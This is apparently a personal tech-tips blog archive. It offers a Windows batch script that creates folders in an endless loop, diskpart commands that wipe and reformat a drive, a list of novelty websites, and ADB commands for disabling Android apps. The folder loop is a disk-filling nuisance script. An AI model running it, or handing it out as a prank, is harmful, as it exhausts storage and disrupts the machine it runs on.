Posts

Showing posts from April, 2022

How To Create Infinite Folders On Windows

Open a Notepad and copy this code to Notepad. @echo off :top md %random% goto top  @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. md %random% is command that creating folders with random names. goto top – return to label :top , infinite loop Save the file with .bat extension(for eg: folderscreate.bat) That’s all if you double click the file it will create a finite folder wherever the batch file is.

Format a Corrupted Pendrive/SD Card Using CMD

Open the CMD window and type the following command and press enter after each. diskpart list disk : a list of all the storage devices connected to your computer will be displayed. select disk # : (example: select disk 2). Cautions: Make sure you enter the disk number correctly. Otherwise, you may format your internal hard drive. clean create partition primary active select partition 1 format fs=fat32

Useful Websites You Might Need Or Just For Fun

https://pointerpointer.com/ - Just a website that points a finger where your mouse pointer is. https://vo.codes/ - Website where you can type text and choose voices of famous people and make them say those sentences. https://tailornova.com/designer - Website where you can fashion design and get a 3D model of your design. http://34.216.122.111/gaugan/ - Website where you can draw and AI automatically turns that into a realistic picture. https://www.security.org/how-secure-is-my-password/ - Website that shows you how secure your password is. https://www.myheritage.com/deep-nostalgia - Website which lets you animate a face from a photo.

Disable System Apps Without Root

To disable a system app using ADB: adb shell pm disable-user --user 0 com.example.application  To re-enable a system app using ADB: adb shell pm enable com.example.application (replace com.example.application with the target application's package name)